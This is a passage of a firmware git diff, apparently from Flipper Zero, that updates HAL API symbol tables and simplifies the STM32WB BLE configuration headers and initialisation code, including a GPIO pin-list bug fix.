Function,+,furi_hal_cdc_get_port_settings,usb_cdc_line_coding*,uint8_t Function,+,furi_hal_cdc_receive,int32_t,"uint8_t, uint8_t*, uint16_t" @@ -1157,8 +1162,10 @@ Function,+,furi_hal_clock_mco_disable,void, Function,+,furi_hal_clock_mco_enable,void,"FuriHalClockMcoSourceId, FuriHalClockMcoDivisorId" Function,-,furi_hal_clock_resume_tick,void, Function,-,furi_hal_clock_suspend_tick,void, -Function,-,furi_hal_clock_switch_to_hsi,void, -Function,-,furi_hal_clock_switch_to_pll,void, +Function,-,furi_hal_clock_switch_hse2hsi,void, +Function,-,furi_hal_clock_switch_hse2pll,_Bool, +Function,-,furi_hal_clock_switch_hsi2hse,void, +Function,-,furi_hal_clock_switch_pll2hse,_Bool, Function,+,furi_hal_console_disable,void, Function,+,furi_hal_console_enable,void, Function,+,furi_hal_console_init,void, @@ -1240,14 +1247,16 @@ Function,-,furi_hal_i2c_deinit_early,void, Function,-,furi_hal_i2c_init,void, Function,-,furi_hal_i2c_init_early,void, Function,+,furi_hal_i2c_is_device_ready,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint32_t" -Function,+,furi_hal_i2c_read_mem,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, uint8_t*, uint8_t, uint32_t" +Function,+,furi_hal_i2c_read_mem,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, uint8_t*, size_t, uint32_t" Function,+,furi_hal_i2c_read_reg_16,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, uint16_t*, uint32_t" Function,+,furi_hal_i2c_read_reg_8,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, uint8_t*, uint32_t" Function,+,furi_hal_i2c_release,void,FuriHalI2cBusHandle* -Function,+,furi_hal_i2c_rx,_Bool,"FuriHalI2cBusHandle*, const uint8_t, uint8_t*, const uint8_t, uint32_t" -Function,+,furi_hal_i2c_trx,_Bool,"FuriHalI2cBusHandle*, const uint8_t, const uint8_t*, const uint8_t, uint8_t*, const uint8_t, uint32_t" -Function,+,furi_hal_i2c_tx,_Bool,"FuriHalI2cBusHandle*, const uint8_t, const uint8_t*, const uint8_t, uint32_t" -Function,+,furi_hal_i2c_write_mem,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, uint8_t*, uint8_t, uint32_t" +Function,+,furi_hal_i2c_rx,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t*, size_t, uint32_t" +Function,+,furi_hal_i2c_rx_ext,_Bool,"FuriHalI2cBusHandle*, uint16_t, _Bool, uint8_t*, size_t, FuriHalI2cBegin, FuriHalI2cEnd, uint32_t" +Function,+,furi_hal_i2c_trx,_Bool,"FuriHalI2cBusHandle*, uint8_t, const uint8_t*, size_t, uint8_t*, size_t, uint32_t" +Function,+,furi_hal_i2c_tx,_Bool,"FuriHalI2cBusHandle*, uint8_t, const uint8_t*, size_t, uint32_t" +Function,+,furi_hal_i2c_tx_ext,_Bool,"FuriHalI2cBusHandle*, uint16_t, _Bool, const uint8_t*, size_t, FuriHalI2cBegin, FuriHalI2cEnd, uint32_t" +Function,+,furi_hal_i2c_write_mem,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, const uint8_t*, size_t, uint32_t" Function,+,furi_hal_i2c_write_reg_16,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, uint16_t, uint32_t" Function,+,furi_hal_i2c_write_reg_8,_Bool,"FuriHalI2cBusHandle*, uint8_t, uint8_t, uint8_t, uint32_t" Function,+,furi_hal_ibutton_emulate_set_next,void,uint32_t @@ -2580,7 +2589,7 @@ Function,+,rgb_backlight_get_rainbow_interval,uint32_t, Function,+,rgb_backlight_get_rainbow_mode,RGBBacklightRainbowMode, Function,+,rgb_backlight_get_rainbow_saturation,uint8_t, Function,+,rgb_backlight_get_rainbow_speed,uint8_t, -Function,-,rgb_backlight_load_settings,void, +Function,-,rgb_backlight_load_settings,void,_Bool Function,+,rgb_backlight_reconfigure,void,_Bool Function,+,rgb_backlight_save_settings,void, Function,+,rgb_backlight_set_color,void,"uint8_t, RgbColor" @@ -3875,6 +3884,7 @@ Variable,+,subghz_protocol_raw_decoder,const SubGhzProtocolDecoder, Variable,+,subghz_protocol_raw_encoder,const SubGhzProtocolEncoder, Variable,+,subghz_protocol_registry,const SubGhzProtocolRegistry, Variable,-,suboptarg,char*, +Variable,+,usb_ccid,FuriHalUsbInterface, Variable,+,usb_cdc_dual,FuriHalUsbInterface, Variable,+,usb_cdc_single,FuriHalUsbInterface, Variable,+,usb_hid,FuriHalUsbInterface, diff --git a/firmware/targets/f7/ble_glue/app_common.h b/firmware/targets/f7/ble_glue/app_common.h index 8eaf23085..e969636d2 100644 --- a/firmware/targets/f7/ble_glue/app_common.h +++ b/firmware/targets/f7/ble_glue/app_common.h @@ -1,30 +1,4 @@ -/* USER CODE BEGIN Header */ -/** - ****************************************************************************** - * File Name : app_common.h - * Description : App Common application configuration file for STM32WPAN Middleware. - * - ****************************************************************************** - * @attention - * - *

© Copyright (c) 2020 STMicroelectronics. - * All rights reserved.

- * - * This software component is licensed by ST under Ultimate Liberty license - * SLA0044, the "License"; You may not use this file except in compliance with - * the License. You may obtain a copy of the License at: - * www.st.com/SLA0044 - * - ****************************************************************************** - */ -/* USER CODE END Header */ -/* Define to prevent recursive inclusion -------------------------------------*/ -#ifndef APP_COMMON_H -#define APP_COMMON_H - -#ifdef __cplusplus -extern "C" { -#endif +#pragma once #include #include @@ -36,5 +10,3 @@ extern "C" { #include #include "app_conf.h" - -#endif diff --git a/firmware/targets/f7/ble_glue/app_conf.h b/firmware/targets/f7/ble_glue/app_conf.h index ee5115cfe..25fa688c7 100644 --- a/firmware/targets/f7/ble_glue/app_conf.h +++ b/firmware/targets/f7/ble_glue/app_conf.h @@ -1,80 +1,32 @@ #pragma once -#include "hw_conf.h" -#include "hw_if.h" - -#include -#include +#include #define CFG_TX_POWER (0x19) /* +0dBm */ #define CFG_IDENTITY_ADDRESS GAP_PUBLIC_ADDR -/** - * Define Advertising parameters - */ -#define CFG_ADV_BD_ADDRESS (0x7257acd87a6c) -#define CFG_FAST_CONN_ADV_INTERVAL_MIN (0x80) /**< 80ms */ -#define CFG_FAST_CONN_ADV_INTERVAL_MAX (0xa0) /**< 100ms */ -#define CFG_LP_CONN_ADV_INTERVAL_MIN (0x640) /**< 1s */ -#define CFG_LP_CONN_ADV_INTERVAL_MAX (0xfa0) /**< 2.5s */ - /** * Define IO Authentication */ -#define CFG_BONDING_MODE (1) -#define CFG_FIXED_PIN (111111) -#define CFG_USED_FIXED_PIN (1) +#define CFG_USED_FIXED_PIN USE_FIXED_PIN_FOR_PAIRING_FORBIDDEN #define CFG_ENCRYPTION_KEY_SIZE_MAX (16) #define CFG_ENCRYPTION_KEY_SIZE_MIN (8) /** * Define IO capabilities */ -#define CFG_IO_CAPABILITY_DISPLAY_ONLY (0x00) -#define CFG_IO_CAPABILITY_DISPLAY_YES_NO (0x01) -#define CFG_IO_CAPABILITY_KEYBOARD_ONLY (0x02) -#define CFG_IO_CAPABILITY_NO_INPUT_NO_OUTPUT (0x03) -#define CFG_IO_CAPABILITY_KEYBOARD_DISPLAY (0x04) - -#define CFG_IO_CAPABILITY CFG_IO_CAPABILITY_DISPLAY_YES_NO +#define CFG_IO_CAPABILITY IO_CAP_DISPLAY_YES_NO /** * Define MITM modes */ -#define CFG_MITM_PROTECTION_NOT_REQUIRED (0x00) -#define CFG_MITM_PROTECTION_REQUIRED (0x01) - -#define CFG_MITM_PROTECTION CFG_MITM_PROTECTION_REQUIRED +#define CFG_MITM_PROTECTION MITM_PROTECTION_REQUIRED /** * Define Secure Connections Support */ -#define CFG_SECURE_NOT_SUPPORTED (0x00) -#define CFG_SECURE_OPTIONAL (0x01) -#define CFG_SECURE_MANDATORY (0x02) - -#define CFG_SC_SUPPORT CFG_SECURE_OPTIONAL - -/** - * Define Keypress Notification Support - */ -#define CFG_KEYPRESS_NOT_SUPPORTED (0x00) -#define CFG_KEYPRESS_SUPPORTED (0x01) - -#define CFG_KEYPRESS_NOTIFICATION_SUPPORT CFG_KEYPRESS_NOT_SUPPORTED - -/** - * Numeric Comparison Answers - */ -#define YES (0x01) -#define NO (0x00) - -/** - * Device name configuration for Generic Access Service - */ -#define CFG_GAP_DEVICE_NAME "TEMPLATE" -#define CFG_GAP_DEVICE_NAME_LENGTH (8) +#define CFG_SC_SUPPORT SC_PAIRING_OPTIONAL /** * Define PHY @@ -87,42 +39,6 @@ #define RX_1M 0x01 #define RX_2M 0x02 -/** -* Identity root key used to derive LTK and CSRK -*/ -#define CFG_BLE_IRK \ - { \ - 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, \ - 0xf0 \ - } - -/** -* Encryption root key used to derive LTK and CSRK -*/ -#define CFG_BLE_ERK \ - { \ - 0xfe, 0xdc, 0xba, 0x09, 0x87, 0x65, 0x43, 0x21, 0xfe, 0xdc, 0xba, 0x09, 0x87, 0x65, 0x43, \ - 0x21 \ - } - -/* USER CODE BEGIN Generic_Parameters */ -/** - * SMPS supply - * SMPS not used when Set to 0 - * SMPS used when Set to 1 - */ -#define CFG_USE_SMPS 1 -/* USER CODE END Generic_Parameters */ - -/**< specific parameters */ -/*****************************************************/ - -/** -* AD Element - Group B Feature -*/ -/* LSB - Second Byte */ -#define CFG_FEATURE_OTA_REBOOT (0x20) - /****************************************************************************** * BLE Stack ******************************************************************************/ @@ -203,7 +119,9 @@ * 1 : external high speed crystal HSE/32/32 * 0 : external low speed crystal ( no calibration ) */ -#define CFG_BLE_LSE_SOURCE 0 +#define CFG_BLE_LSE_SOURCE \ + SHCI_C2_BLE_INIT_CFG_BLE_LS_CLK_LSE | SHCI_C2_BLE_INIT_CFG_BLE_LS_OTHER_DEV | \ + SHCI_C2_BLE_INIT_CFG_BLE_LS_CALIB /** * Start up time of the high speed (16 or 32 MHz) crystal oscillator in units of 625/256 us (~2.44 us) @@ -253,8 +171,8 @@ */ #define CFG_BLE_OPTIONS \ (SHCI_C2_BLE_INIT_OPTIONS_LL_HOST | SHCI_C2_BLE_INIT_OPTIONS_WITH_SVC_CHANGE_DESC | \ - SHCI_C2_BLE_INIT_OPTIONS_DEVICE_NAME_RW | SHCI_C2_BLE_INIT_OPTIONS_NO_EXT_ADV | \ - SHCI_C2_BLE_INIT_OPTIONS_NO_CS_ALGO2 | SHCI_C2_BLE_INIT_OPTIONS_POWER_CLASS_2_3) + SHCI_C2_BLE_INIT_OPTIONS_DEVICE_NAME_RO | SHCI_C2_BLE_INIT_OPTIONS_EXT_ADV | \ + SHCI_C2_BLE_INIT_OPTIONS_CS_ALGO2 | SHCI_C2_BLE_INIT_OPTIONS_POWER_CLASS_2_3) /** * Queue length of BLE Event @@ -282,187 +200,3 @@ 255 /**< Set to 255 with the memory manager and the mailbox */ #define TL_BLE_EVENT_FRAME_SIZE (TL_EVT_HDR_SIZE + CFG_TLBLE_MOST_EVENT_PAYLOAD_SIZE) -/****************************************************************************** - * UART interfaces - ******************************************************************************/ - -/** - * Select UART interfaces - */ -#define CFG_DEBUG_TRACE_UART hw_uart1 -#define CFG_CONSOLE_MENU 0 - -/****************************************************************************** - * Low Power - ******************************************************************************/ -/** - * When set to 1, the low power mode is enable - * When set to 0, the device stays in RUN mode - */ -#define CFG_LPM_SUPPORTED 1 - -/****************************************************************************** - * Timer Server - ******************************************************************************/ -/** - * CFG_RTC_WUCKSEL_DIVIDER: This sets the RTCCLK divider to the wakeup timer. - * The lower is the value, the better is the power consumption and the accuracy of the timerserver - * The higher is the value, the finest is the granularity - * - * CFG_RTC_ASYNCH_PRESCALER: This sets the asynchronous prescaler of the RTC. It should as high as possible ( to ouput - * clock as low as possible) but the output clock should be equal or higher frequency compare to the clock feeding - * the wakeup timer. A lower clock speed would impact the accuracy of the timer server. - * - * CFG_RTC_SYNCH_PRESCALER: This sets the synchronous prescaler of the RTC. - * When the 1Hz calendar clock is required, it shall be sets according to other settings - * When the 1Hz calendar clock is not needed, CFG_RTC_SYNCH_PRESCALER should be set to 0x7FFF (MAX VALUE) - * - * CFG_RTCCLK_DIVIDER_CONF: - * Shall be set to either 0,2,4,8,16 - * When set to either 2,4,8,16, the 1Hhz calendar is supported - * When set to 0, the user sets its own configuration - * - * The following settings are computed with LSI as input to the RTC - */ -#define CFG_RTCCLK_DIVIDER_CONF 0 - -#if(CFG_RTCCLK_DIVIDER_CONF == 0) -/** - * Custom configuration - * It does not support 1Hz calendar - * It divides the RTC CLK by 16 - */ -#define CFG_RTCCLK_DIV (16) -#define CFG_RTC_WUCKSEL_DIVIDER (0) -#define CFG_RTC_ASYNCH_PRESCALER (CFG_RTCCLK_DIV - 1) -#define CFG_RTC_SYNCH_PRESCALER (0x7FFF) - -#else - -#if(CFG_RTCCLK_DIVIDER_CONF == 2) -/** - * It divides the RTC CLK by 2 - */ -#define CFG_RTC_WUCKSEL_DIVIDER (3) -#endif - -#if(CFG_RTCCLK_DIVIDER_CONF == 4) -/** - * It divides the RTC CLK by 4 - */ -#define CFG_RTC_WUCKSEL_DIVIDER (2) -#endif - -#if(CFG_RTCCLK_DIVIDER_CONF == 8) -/** - * It divides the RTC CLK by 8 - */ -#define CFG_RTC_WUCKSEL_DIVIDER (1) -#endif - -#if(CFG_RTCCLK_DIVIDER_CONF == 16) -/** - * It divides the RTC CLK by 16 - */ -#define CFG_RTC_WUCKSEL_DIVIDER (0) -#endif - -#define CFG_RTCCLK_DIV CFG_RTCCLK_DIVIDER_CONF -#define CFG_RTC_ASYNCH_PRESCALER (CFG_RTCCLK_DIV - 1) -#define CFG_RTC_SYNCH_PRESCALER (DIVR(LSE_VALUE, (CFG_RTC_ASYNCH_PRESCALER + 1)) - 1) - -#endif - -/** tick timer value in us */ -#define CFG_TS_TICK_VAL DIVR((CFG_RTCCLK_DIV * 1000000), LSE_VALUE) - -typedef enum { - CFG_TIM_PROC_ID_ISR, - /* USER CODE BEGIN CFG_TimProcID_t */ - - /* USER CODE END CFG_TimProcID_t */ -} CFG_TimProcID_t; - -/****************************************************************************** - * Debug - ******************************************************************************/ -/** - * When set, this resets some hw resources to set the device in the same state than the power up - * The FW resets only register that may prevent the FW to run properly - * - * This shall be set to 0 in a final product - * - */ -#define CFG_HW_RESET_BY_FW 0 - -/** - * keep debugger enabled while in any low power mode when set to 1 - * should be set to 0 in production - */ -#define CFG_DEBUGGER_SUPPORTED 1 - -/** - * When set to 1, the traces are enabled in the BLE services - */ -#define CFG_DEBUG_BLE_TRACE 0 - -/** - * Enable or Disable traces in application - */ -#define CFG_DEBUG_APP_TRACE 0 - -#if(CFG_DEBUG_APP_TRACE != 0) -#define APP_DBG_MSG PRINT_MESG_DBG -#else -#define APP_DBG_MSG PRINT_NO_MESG -#endif - -#if((CFG_DEBUG_BLE_TRACE != 0) || (CFG_DEBUG_APP_TRACE != 0)) -#define CFG_DEBUG_TRACE 1 -#endif - -#if(CFG_DEBUG_TRACE != 0) -#undef CFG_LPM_SUPPORTED -#undef CFG_DEBUGGER_SUPPORTED -#define CFG_LPM_SUPPORTED 0 -#define CFG_DEBUGGER_SUPPORTED 1 -#endif - -/** - * When CFG_DEBUG_TRACE_FULL is set to 1, the trace are output with the API name, the file name and the line number - * When CFG_DEBUG_TRACE_LIGHT is set to 1, only the debug message is output - * - * When both are set to 0, no trace are output - * When both are set to 1, CFG_DEBUG_TRACE_FULL is selected - */ -#define CFG_DEBUG_TRACE_LIGHT 0 -#define CFG_DEBUG_TRACE_FULL 0 - -#if((CFG_DEBUG_TRACE != 0) && (CFG_DEBUG_TRACE_LIGHT == 0) && (CFG_DEBUG_TRACE_FULL == 0)) -#undef CFG_DEBUG_TRACE_FULL -#undef CFG_DEBUG_TRACE_LIGHT -#define CFG_DEBUG_TRACE_FULL 0 -#define CFG_DEBUG_TRACE_LIGHT 1 -#endif - -#if(CFG_DEBUG_TRACE == 0) -#undef CFG_DEBUG_TRACE_FULL -#undef CFG_DEBUG_TRACE_LIGHT -#define CFG_DEBUG_TRACE_FULL 0 -#define CFG_DEBUG_TRACE_LIGHT 0 -#endif - -/** - * When not set, the traces is looping on sending the trace over UART - */ -#define DBG_TRACE_USE_CIRCULAR_QUEUE 0 - -/** - * max buffer Size to queue data traces and max data trace allowed. - * Only Used if DBG_TRACE_USE_CIRCULAR_QUEUE is defined - */ -#define DBG_TRACE_MSG_QUEUE_SIZE 4096 -#define MAX_DBG_TRACE_MSG_SIZE 1024 - -#define CFG_OTP_BASE_ADDRESS OTP_AREA_BASE -#define CFG_OTP_END_ADRESS OTP_AREA_END_ADDR diff --git a/firmware/targets/f7/ble_glue/app_debug.c b/firmware/targets/f7/ble_glue/app_debug.c index b443bee21..fe76687b9 100644 --- a/firmware/targets/f7/ble_glue/app_debug.c +++ b/firmware/targets/f7/ble_glue/app_debug.c @@ -6,6 +6,9 @@ #include #include +#include "stm32wbxx_ll_bus.h" +#include "stm32wbxx_ll_pwr.h" + #include typedef PACKED_STRUCT { @@ -108,10 +111,6 @@ static void APPD_SetCPU2GpioConfig(void); static void APPD_BleDtbCfg(void); void APPD_Init() { -#if(CFG_DEBUG_TRACE != 0) - DbgTraceInit(); -#endif - APPD_SetCPU2GpioConfig(); APPD_BleDtbCfg(); } @@ -196,14 +195,14 @@ static void APPD_SetCPU2GpioConfig(void) { gpio_config.Pin = gpiob_pin_list; LL_C2_AHB2_GRP1_EnableClock(LL_C2_AHB2_GRP1_PERIPH_GPIOB); LL_GPIO_Init(GPIOB, &gpio_config); - LL_GPIO_ResetOutputPin(GPIOB, gpioa_pin_list); + LL_GPIO_ResetOutputPin(GPIOB, gpiob_pin_list); } if(gpioc_pin_list != 0) { gpio_config.Pin = gpioc_pin_list; LL_C2_AHB2_GRP1_EnableClock(LL_C2_AHB2_GRP1_PERIPH_GPIOC); LL_GPIO_Init(GPIOC, &gpio_config); - LL_GPIO_ResetOutputPin(GPIOC, gpioa_pin_list); + LL_GPIO_ResetOutputPin(GPIOC, gpioc_pin_list); } } @@ -252,13 +251,3 @@ static void APPD_BleDtbCfg(void) { } #endif } - -#if(CFG_DEBUG_TRACE != 0) -void DbgOutputInit(void) { -} - -void DbgOutputTraces(uint8_t* p_data, uint16_t size, void (*cb)(void)) { - furi_hal_console_tx(p_data, size); - cb(); -} -#endif diff --git a/firmware/targets/f7/ble_glue/app_debug.h b/firmware/targets/f7/ble_glue/app_debug.h index 92a54d75b..213470bed 100644 --- a/firmware/targets/f7/ble_glue/app_debug.h +++ b/firmware/targets/f7/ble_glue/app_debug.h @@ -1,26 +1,4 @@ -/* USER CODE BEGIN Header */ -/** - ****************************************************************************** - * File Name : app_debug.h - * Description : Header for app_debug.c module - ****************************************************************************** - * @attention - * - *

© Copyright (c) 2020 STMicroelectronics. - * All rights reserved.

- * - * This software component is licensed by ST under Ultimate Liberty license - * SLA0044, the "License"; You may not use this file except in compliance with - * the License. You may obtain a copy of the License at: - * www.st.com/SLA0044 - * - ****************************************************************************** - */ -/* USER CODE END Header */ - -/* Define to prevent recursive inclusion -------------------------------------*/ -#ifndef __APP_DEBUG_H -#define __APP_DEBUG_H +#pragma once #ifdef __cplusplus extern "C" { @@ -32,7 +10,3 @@ void APPD_EnableCPU2(void); #ifdef __cplusplus } #endif - -#endif /*__APP_DEBUG_H */ - -/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/firmware/targets/f7/ble_glue/ble_app.c b/firmware/targets/f7/ble_glue/ble_app.c index 37d8f7cd0..37ec3d0b9 100644 --- a/firmware/targets/f7/ble_glue/ble_app.c +++ b/firmware/targets/f7/ble_glue/ble_app.c @@ -18,8 +18,8 @@ PLACE_IN_SECTION("MB_MEM1") ALIGN(4) static TL_CmdPacket_t ble_app_cmd_buffer; PLACE_IN_SECTION("MB_MEM2") ALIGN(4) static uint32_t ble_app_nvm[BLE_NVM_SRAM_SIZE]; _Static_assert( - sizeof(SHCI_C2_Ble_Init_Cmd_Packet_t) == 57, - "Ble stack config structure size mismatch (check new config options - last updated for v.1.15.0)"); + sizeof(SHCI_C2_Ble_Init_Cmd_Packet_t) == 58, + "Ble stack config structure size mismatch (check new config options - last updated for v.1.17.2)"); typedef struct { FuriMutex* hci_mtx; @@ -33,6 +33,54 @@ static int32_t ble_app_hci_thread(void* context); static void ble_app_hci_event_handler(void* pPayload); static void ble_app_hci_status_not_handler(HCI_TL_CmdStatus_t status); +static const HCI_TL_HciInitConf_t hci_tl_config = { + .p_cmdbuffer = (uint8_t*)&ble_app_cmd_buffer, + .StatusNotCallBack = ble_app_hci_status_not_handler, +}; + +static const SHCI_C2_CONFIG_Cmd_Param_t config_param = { + .PayloadCmdSize = SHCI_C2_CONFIG_PAYLOAD_CMD_SIZE, + .Config1 = SHCI_C2_CONFIG_CONFIG1_BIT0_BLE_NVM_DATA_TO_SRAM, + .BleNvmRamAddress = (uint32_t)ble_app_nvm, + .EvtMask1 = SHCI_C2_CONFIG_EVTMASK1_BIT1_BLE_NVM_RAM_UPDATE_ENABLE, +}; + +static const SHCI_C2_Ble_Init_Cmd_Packet_t ble_init_cmd_packet = { + .Header = {{0, 0, 0}}, // Header unused + .Param = { + .pBleBufferAddress = 0, // pBleBufferAddress not used + .BleBufferSize = 0, // BleBufferSize not used + .NumAttrRecord = CFG_BLE_NUM_GATT_ATTRIBUTES, + .NumAttrServ = CFG_BLE_NUM_GATT_SERVICES, + .AttrValueArrSize = CFG_BLE_ATT_VALUE_ARRAY_SIZE, + .NumOfLinks = CFG_BLE_NUM_LINK, + .ExtendedPacketLengthEnable = CFG_BLE_DATA_LENGTH_EXTENSION, + .PrWriteListSize = CFG_BLE_PREPARE_WRITE_LIST_SIZE, + .MblockCount = CFG_BLE_MBLOCK_COUNT, + .AttMtu = CFG_BLE_MAX_ATT_MTU, + .SlaveSca = CFG_BLE_SLAVE_SCA, + .MasterSca = CFG_BLE_MASTER_SCA, + .LsSource = CFG_BLE_LSE_SOURCE, + .MaxConnEventLength = CFG_BLE_MAX_CONN_EVENT_LENGTH, + .HsStartupTime = CFG_BLE_HSE_STARTUP_TIME, + .ViterbiEnable = CFG_BLE_VITERBI_MODE, + .Options = CFG_BLE_OPTIONS, + .HwVersion = 0, + .max_coc_initiator_nbr = 32, + .min_tx_power = 0, + .max_tx_power = 0, + .rx_model_config = 1, + /* New stack (13.3->15.0) */ + .max_adv_set_nbr = 1, // Only used if SHCI_C2_BLE_INIT_OPTIONS_EXT_ADV is set + .max_adv_data_len = 1650, // Only used if SHCI_C2_BLE_INIT_OPTIONS_EXT_ADV is set + .tx_path_compens = 0, // RF TX Path Compensation, * 0.1 dB + .rx_path_compens = 0, // RF RX Path Compensation, * 0.1 dB + .ble_core_version = SHCI_C2_BLE_INIT_BLE_CORE_5_4, + /*15.0->17.0*/ + .Options_extension = SHCI_C2_BLE_INIT_OPTIONS_ENHANCED_ATT_NOTSUPPORTED | + SHCI_C2_BLE_INIT_OPTIONS_APPEARANCE_READONLY, + }}; + bool ble_app_init() { SHCI_CmdStatus_t status; ble_app = malloc(sizeof(BleApp)); @@ -44,58 +92,16 @@ bool ble_app_init() { furi_thread_start(ble_app->thread); // Initialize Ble Transport Layer - HCI_TL_HciInitConf_t hci_tl_config = { - .p_cmdbuffer = (uint8_t*)&ble_app_cmd_buffer, - .StatusNotCallBack = ble_app_hci_status_not_handler, - }; hci_init(ble_app_hci_event_handler, (void*)&hci_tl_config); // Configure NVM store for pairing data - SHCI_C2_CONFIG_Cmd_Param_t config_param = { - .PayloadCmdSize = SHCI_C2_CONFIG_PAYLOAD_CMD_SIZE, - .Config1 = SHCI_C2_CONFIG_CONFIG1_BIT0_BLE_NVM_DATA_TO_SRAM, - .BleNvmRamAddress = (uint32_t)ble_app_nvm, - .EvtMask1 = SHCI_C2_CONFIG_EVTMASK1_BIT1_BLE_NVM_RAM_UPDATE_ENABLE, - }; - status = SHCI_C2_Config(&config_param); + status = SHCI_C2_Config((SHCI_C2_CONFIG_Cmd_Param_t*)&config_param); if(status) { FURI_LOG_E(TAG, "Failed to configure 2nd core: %d", status); } // Start ble stack on 2nd core - SHCI_C2_Ble_Init_Cmd_Packet_t ble_init_cmd_packet = { - .Header = {{0, 0, 0}}, // Header unused - .Param = { - .pBleBufferAddress = 0, // pBleBufferAddress not used - .BleBufferSize = 0, // BleBufferSize not used - .NumAttrRecord = CFG_BLE_NUM_GATT_ATTRIBUTES, - .NumAttrServ = CFG_BLE_NUM_GATT_SERVICES, - .AttrValueArrSize = CFG_BLE_ATT_VALUE_ARRAY_SIZE, - .NumOfLinks = CFG_BLE_NUM_LINK, - .ExtendedPacketLengthEnable = CFG_BLE_DATA_LENGTH_EXTENSION, - .PrWriteListSize = CFG_BLE_PREPARE_WRITE_LIST_SIZE, - .MblockCount = CFG_BLE_MBLOCK_COUNT, - .AttMtu = CFG_BLE_MAX_ATT_MTU, - .SlaveSca = CFG_BLE_SLAVE_SCA, - .MasterSca = CFG_BLE_MASTER_SCA, - .LsSource = CFG_BLE_LSE_SOURCE, - .MaxConnEventLength = CFG_BLE_MAX_CONN_EVENT_LENGTH, - .HsStartupTime = CFG_BLE_HSE_STARTUP_TIME, - .ViterbiEnable = CFG_BLE_VITERBI_MODE, - .Options = CFG_BLE_OPTIONS, - .HwVersion = 0, - .max_coc_initiator_nbr = 32, - .min_tx_power = 0, - .max_tx_power = 0, - .rx_model_config = 1, - /* New stack (13.3->15.0) */ - .max_adv_set_nbr = 1, // Only used if SHCI_C2_BLE_INIT_OPTIONS_EXT_ADV is set - .max_adv_data_len = 31, // Only used if SHCI_C2_BLE_INIT_OPTIONS_EXT_ADV is set - .tx_path_compens = 0, // RF TX Path Compensation, * 0.1 dB - .rx_path_compens = 0, // RF RX Path Compensation, * 0.1 dB - .ble_core_version = 11, // BLE Core Version: 11(5.2), 12(5.3) - }}; - status = SHCI_C2_BLE_Init(&ble_init_cmd_packet); + status = SHCI_C2_BLE_Init((SHCI_C2_Ble_Init_Cmd_Packet_t*)&ble_init_cmd_packet); if(status) { FURI_LOG_E(TAG, "Failed to start ble stack: %d", status); } @@ -175,9 +181,11 @@ static void ble_app_hci_event_handler(void* pPayload) { static void ble_app_hci_status_not_handler(HCI_TL_CmdStatus_t status) { if(status == HCI_TL_CmdBusy) { + furi_hal_power_insomnia_enter(); furi_mutex_acquire(ble_app->hci_mtx, FuriWaitForever); } else if(status == HCI_TL_CmdAvailable) { furi_mutex_release(ble_app->hci_mtx); + furi_hal_power_insomnia_exit(); } } diff --git a/firmware/targets/f7/ble_glue/ble_app.h b/firmware/targets/f7/ble_glue/ble_app.h index 495005ec4..2e6babab7 100644 --- a/firmware/targets/f7/ble_glue/ble_app.h +++ b/firmware/targets/f7/ble_glue/ble_app.h @@ -1,12 +1,12 @@ #pragma once +#include +#include + #ifdef __cplusplus extern "C" { #endif -#include -#include - bool ble_app_init(); void ble_app_get_key_storage_buff(uint8_t** addr, uint16_t* size); void ble_app_thread_stop(); diff --git a/firmware/targets/f7/ble_glue/ble_conf.h b/firmware/targets/f7/ble_glue/ble_conf.h index a04d1def1..2b9c22dfe 100644 --- a/firmware/targets/f7/ble_glue/ble_conf.h +++ b/firmware/targets/f7/ble_glue/ble_conf.h @@ -1,51 +1,7 @@ -/** - ****************************************************************************** - * File Name : App/ble_conf.h - * Description : Configuration file for BLE Middleware. - * - ****************************************************************************** - * @attention - * - *

© Copyright (c) 2020 STMicroelectronics. - * All rights reserved.

- * - * This software component is licensed by ST under Ultimate Liberty license - * SLA0044, the "License"; You may not use this file except in compliance with - * the License. You may obtain a copy of the License at: - * www.st.com/SLA0044 - * - ****************************************************************************** - */ - -/* Define to prevent recursive inclusion -------------------------------------*/ -#ifndef BLE_CONF_H -#define BLE_CONF_H +#pragma once #include "app_conf.h" -#ifndef __weak -#define __weak __attribute__((weak)) -#endif - -/****************************************************************************** - * - * BLE SERVICES CONFIGURATION - * blesvc - * - ******************************************************************************/ - -/** - * This setting shall be set to '1' if the device needs to support the Peripheral Role - * In the MS configuration, both BLE_CFG_PERIPHERAL and BLE_CFG_CENTRAL shall be set to '1' - */ -#define BLE_CFG_PERIPHERAL 1 - -/** - * This setting shall be set to '1' if the device needs to support the Central Role - * In the MS configuration, both BLE_CFG_PERIPHERAL and BLE_CFG_CENTRAL shall be set to '1' - */ -#define BLE_CFG_CENTRAL 0 - /** * There is one handler per service enabled * Note: There is no handler for the Device Information Service @@ -56,18 +12,3 @@ #define BLE_CFG_SVC_MAX_NBR_CB 7 #define BLE_CFG_CLT_MAX_NBR_CB 0 - -/****************************************************************************** - * GAP Service - Apprearance - ******************************************************************************/ - -#define BLE_CFG_UNKNOWN_APPEARANCE (0) -#define BLE_CFG_GAP_APPEARANCE (0x0086) - -/****************************************************************************** - * Over The Air Feature (OTA) - STM Proprietary - ******************************************************************************/ -#define BLE_CFG_OTA_REBOOT_CHAR 0 /**< REBOOT OTA MODE CHARACTERISTIC */ - -#endif /*BLE_CONF_H */ -/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/firmware/targets/f7/ble_glue/ble_const.h b/firmware/targets/f7/ble_glue/ble_const.h index 85f734b62..1e6647d90 100644 --- a/firmware/targets/f7/ble_glue/ble_const.h +++ b/firmware/targets/f7/ble_glue/ble_const.h @@ -1,22 +1,4 @@ -/***************************************************************************** - * @file ble_const.h - * @author MDG - * @brief This file contains the definitions which are compiler dependent. - ***************************************************************************** - * @attention - * - * Copyright (c) 2018-2022 STMicroelectronics. - * All rights reserved. - * - * This software is licensed under terms that can be found in the LICENSE file - * in the root directory of this software component. - * If no LICENSE file comes with this software, it is 